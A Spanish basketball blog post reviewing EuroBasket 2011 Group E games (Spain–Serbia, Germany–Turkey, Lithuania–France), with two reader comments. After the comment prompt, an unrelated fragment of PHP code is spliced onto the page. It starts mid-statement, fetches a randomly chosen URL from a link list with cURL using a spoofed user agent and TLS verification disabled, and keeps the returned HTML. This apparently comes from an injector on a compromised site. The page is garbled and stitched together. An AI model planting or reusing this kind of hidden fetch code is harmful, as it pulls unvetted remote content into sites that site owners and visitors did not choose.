EuroNBAsket 2011: Suspense en el Grupo E

10 de September de 2011 por TheDeerHunter

Menuda última jornada nos espera en el Grupo E. Los 6 equipos tienen sus opciones de pasar en mayor o menor medida y el final de la liguilla se antoja apasionante.

Se ha demostrado que España, aun con sus evidentes defectos, posee un potencial de juego que no puede alcanzar nadie y que Francia es una selección solvente. El domingo se jugarán la primera y segunda plaza del grupo en lo que algunos ven una posible final anticipada.
Los anfitriones también tiene la plaza asegurada y, aunque ya les hemos visto hincar la rodilla más de una vez, pueden presentar un cruce terrible al amparo de su ardiente afición.
De los otros 3, Serbia son los únicos que dependen de si mismos y asegurarían plaza ganando a Turquía. Los otomanos deberán mirar por el retrovisor porque aun ganando su partido debería perder Alemania para que siguieran vivos. Los germanos necesitan la derrota de Turquía y una amplia victoria contra lituania. Difícil papeleta.

España 84 – Serbia 54:
Todavía duele el puñal que clavó Teodosic desde 8 metros en el mundial. Ni siquiera un palizón como el se llevaron ayer sirve como represalia, pero los serbios se dejaron casi todo su buen nombre por el camino. Ya se han llevado 2 de 2 baños en este grupo y habría que ser muy indulgente con ellos para seguir teniéndoles presentes. Su defensa ha sido de risa todo el torneo y ayer salieron absolutamente derrotados ante los vigentes campeones.
Sacar a Savanovic de la titularidad no ha sido la mejor genialidad que se le ha ocurrido a Ivkovic. Puede que tampoco hubiera cambiado mucho ante la evidente superioridad de Pau Gasol, pero creo que al menos se había ganado el beneficio de la duda. También fue de lo mejorcito de su selección en el poco rato que le vimos.
Krstic, en un día complicadísimo para él ante un Marc superlativo, fue el único que se salvó de la quema. Por Teodosic y Keselj ni preguntéis.
Veremos qué cara muestran en la última jornada porque no lo van a tener ni mucho menos fácil.

Destacados NBA: Pau Gasol 26 ptos, 8 reb, 3 asis, 2 tap; Marc Gasol 20 ptos, 10 reb, 1 asis, 1 rob

Alemania 73 – Turquía 67: El bombazo de la jornada lo dió una Alemania con la que ya casi nadie contaba. Tenía que aparecer el tiro en el pie de Turquía y lo hizo en forma del 10 de 22 en tiros libres y un 4 de 15 en lanzamientos de Turkoglu. Gran partido de Omer Asik, pero perdió la batalla contra la parejita Nowitzki&Kaman en modo “al rescate”. Como la jornada anterior contra España resultó vital la aportación de varios secundarios. Extraordinario trabajo de Schwethelm y también la de los bases que tanto daño nos hicieron, Schaffartzik y el incombustible Hamann. No encontró esta aportación Turquía ni siquiera de algunos NBA.

Destacados NBA: Chris Kaman 20 ptos, 7 reb, 3 tap, 1 rob; Dirk Nowitzki 19 ptos, 7 reb, 3 asis
Omer Asik 19 ptos, 11 reb

Lituania 67 – Francia 73:
Jarro de agua fría para la anfitriona. Tras la exhibición del otro día nadie esperaba este apagón generalizado. Actuación más bien mediocre de ambos. Los lituanos pudieron controlar por momentos a Tony Parker, pero no esperaban la irrupción de Nando de Colo al que Collet viéndole ayer permitió hacer y deshacer a su antojo (¿lo hubiera permitido algún otro entrenador que conocemos?) Talento bruto en una selección que no anda sobrada del mismo. Lo agradecieron.
Los lituanos estuvieron especialmente espesos en el tiro y en el control del balón. Como Turquía el día anterior vieron que cualquier mínima diferencia se convertía en una trinchera a asaltar. Espíritu Spur en la selección gala… espíritu ganador. Cuidado que vienen.

Destacado NBA: Tony Parker 19 ptos, 3 reb, 1 asis, 1 rob
Destacado resto: Nando de Colo 21 ptos, 5 rob, 4 reb

Comenta

2 comentarios a esta entrada

  1. safd dice:
    #1

    Yo creo q se clasificara Serbia de los que quedan, aunq su partido puede ser increible contra Turquia la verdad.

    Increible De Colo ayer, si esq Francia es la ostia, q no juega bien uno, pues sale otro. Noah impresionante (junto con marc se va a jugar el puesto de mejor center del torneo) y batum como siempre, esplendido. Parker, posiblementee en el mejor quinteto del torneo, muy bien lo tendria q hacer teodosic pa quitarle el puesto…. oq macedonia llegue a la final y le den el puesto a mccaleb, es una opcion xddd.

    Dirk me parece q ta mu pasota la verdad, y alemania depende demasiado de los itneriores. No se si lo veis como yo, pero al principio del torneo jugadores como Benzing los veia yo mejor, sera la presion…

    España… porq coño no juega Ibaka? Q alguien me lo explique. Que tiene mejor q Ibaka, Reyes? O Marc (q a mi me encanta eh) es tan superior sobre Ibaka como para jugar 20 minutos mas? yo no lo entiendo muy bien la verdad… En cuanto a juego, no va mal la cosa, siempre con lagunas, lo importante esq seamos regulares.

    Vamos a ver contra Francia, el 3 mejor juego interior del torneo posiblemente, aunq los alemanes son mu pasotas, diaw-noah son muy completos. Estara divertido, francia es un equipo muy coordinado, junto con españa ahora mismo los favoritos, aunq yo creo q Lituania llegara a la final… lituania-españa creo yo desde el dia 1 y no cambiare mi idea xd

    PD: No es por spam ni na de eso, pero… alguno conoce la RNB? esq buscamos managers, a quien le interese, aqui tiene las normas http://www.blansket.es/foro/index.php?topic=1571.0 La verdad q engancha mucho xd

      Citar

  2. Txusma dice:
    #2

    Creo que a Ibaka le falta bastante en el aspecto táctico. Piensa que Reyes lleva jugando muchos años con la selección y conoce al dedillo a sus compañeros y los sistemas. Ibaka ha de aprendiendo poco a poco.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>